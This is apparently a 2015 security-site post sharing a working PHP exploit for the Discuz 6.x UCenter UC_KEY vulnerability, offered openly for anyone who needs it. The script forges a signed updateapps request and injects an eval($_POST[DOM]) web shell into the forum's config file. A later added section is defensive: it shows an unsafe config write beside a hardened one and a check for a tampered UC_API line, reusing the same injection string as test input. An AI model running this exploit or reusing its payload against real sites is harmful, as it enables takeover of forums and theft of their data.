DZ6.x UC_KEY getwebshell exploit - vulnerability warning - the black bar safety net

2015-11-23T00:00:00
ID MYHACK58:62201569289
Type myhack58
Reporter Anonymous
Modified 2015-11-23T00:00:00

Description

Exploits for the uc_key vulnerability in Discuz 7.x and the Discuz X series are already available online. Today I ran into a Discuz 6.0 site, so I analysed its code, modified the exploit program, and am sharing it for anyone who needs it. uc_key getshell is a fairly widespread and long-standing vulnerability: basically any program that uses the UCenter user center can be affected, but the exploit has to be written for the specific program. The latest Discuz version appears to be patched; I have not looked at that code in detail.

Three things to note:

1. XML parsing in dz6.x is different, so the exploit must be changed to use $post = uc_unserialize(uc_post_contents());
2. In low versions $UC_API is not escaped, so there is no need to send the request twice: $configfile = preg_replace("/define\('UC_API',\s*'.*?'\);/i", "define('UC_API', '$UC_API');", $configfile);
3. The encryption function in low versions is different.

The code:

```php
<?php
// Code copyright belongs to the original author!
$timestamp = time() + 103600;
$host = "127.0.0.1";
$uc_key = "Qfp1O0N3h5V356bbUdPer3958dp8X3b55dba9fkai7s3q7aby9i3hcnc7ec505sa";
// Sign the updateapps action with the site's UC_KEY, the same way UCenter does.
$code = urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));
$cmd1 = ' http://xxx\');eval($_POST[DOM]);// ';
$html1 = send($cmd1);
echo $html1;

// Send the raw HTTP POST to /dz/api/uc.php and return the full response.
function send($cmd) {
    global $host, $code;
    $message  = "POST /dz/api/uc.php?code=" . $code . " HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: " . $host . "\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: " . $host . "\r\n";
    $message .= "Content-Length: " . strlen($cmd) . "\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    fputs($fp, $message);
    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);
    return $resp;
}

// Discuz/UCenter authcode(): RC4-style keystream keyed from md5(UC_KEY),
// with a 10-digit expiry and a 16-char MAC prefixed to the plaintext.
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;
    $key = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';
    $cryptkey = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);
    $string = $operation == 'DECODE'
        ? base64_decode(substr($string, $ckey_length))
        : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);
    $result = '';
    $box = range(0, 255);
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }
    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }
    if ($operation == 'DECODE') {
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0)
            && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}
?>
```
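The root cause behind note 2 is the config rewrite in updateapps: an attacker-supplied UC_API value is spliced straight into PHP source. The following is an added example, not code from the original post or from Discuz/UCenter: it shows that unsafe write beside a hardened version that validates the value and emits it through var_export(), and adds a check a site owner can run over a config file to see whether the UC_API line carries anything beyond a plain quoted URL. The variable names $UC_API and $configfile come from the post; the function names and the sample config are constructed for this example.

```php
<?php
// Added example (not from the original post). Function names are hypothetical.

// Unsafe: $UC_API is interpolated into PHP source. A value containing
// ');  ... // closes the string literal and turns the rest into code.
function write_uc_api_unsafe($configfile, $UC_API) {
    return preg_replace("/define\('UC_API',\s*'.*?'\);/i",
        "define('UC_API', '$UC_API');", $configfile);
}

// Hardened: accept only an http(s) URL built from characters that can never
// close a PHP string, then let var_export() produce the quoted literal so
// quotes and backslashes are escaped by the language, not by hand.
function write_uc_api_safe($configfile, $UC_API) {
    if (!filter_var($UC_API, FILTER_VALIDATE_URL)
        || !preg_match('#^https?://[A-Za-z0-9.\-_:/]+$#', $UC_API)) {
        throw new InvalidArgumentException('UC_API must be a plain http(s) URL');
    }
    $literal = var_export($UC_API, true);   // e.g. 'http://uc.example.test'
    return preg_replace("/define\('UC_API',\s*'.*?'\);/i",
        "define('UC_API', $literal);", $configfile);
}

// Integrity check: true when the UC_API define line contains anything other
// than a single quoted http(s) URL (quotes or backslashes inside the value,
// or trailing code after the closing parenthesis).
function uc_api_line_tampered($configfile) {
    if (!preg_match("/^.*define\('UC_API'.*$/m", $configfile, $m)) {
        return false;   // no UC_API define present at all
    }
    $line = $m[0];
    return !preg_match("#^\s*define\('UC_API',\s*'https?://[^'\\\\]*'\);\s*\$#", $line);
}

// Constructed sample config, not taken from any real site.
$sample = "<?php\ndefine('UC_CONNECT', 'mysql');\n"
        . "define('UC_API', 'http://uc.example.test');\n";

var_dump(uc_api_line_tampered($sample));                                 // false
var_dump(uc_api_line_tampered(
    write_uc_api_unsafe($sample, "http://xxx');eval(\$_POST[DOM]);//")));  // true

try {
    write_uc_api_safe($sample, "http://xxx');eval(\$_POST[DOM]);//");
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
echo write_uc_api_safe($sample, "http://uc2.example.test");
```

Running the check over config.inc.php on a live forum is a quick way to confirm whether this particular write path has already been abused; a clean line looks exactly like the sample's, while an injected one fails the match because of the extra code after the closing quote.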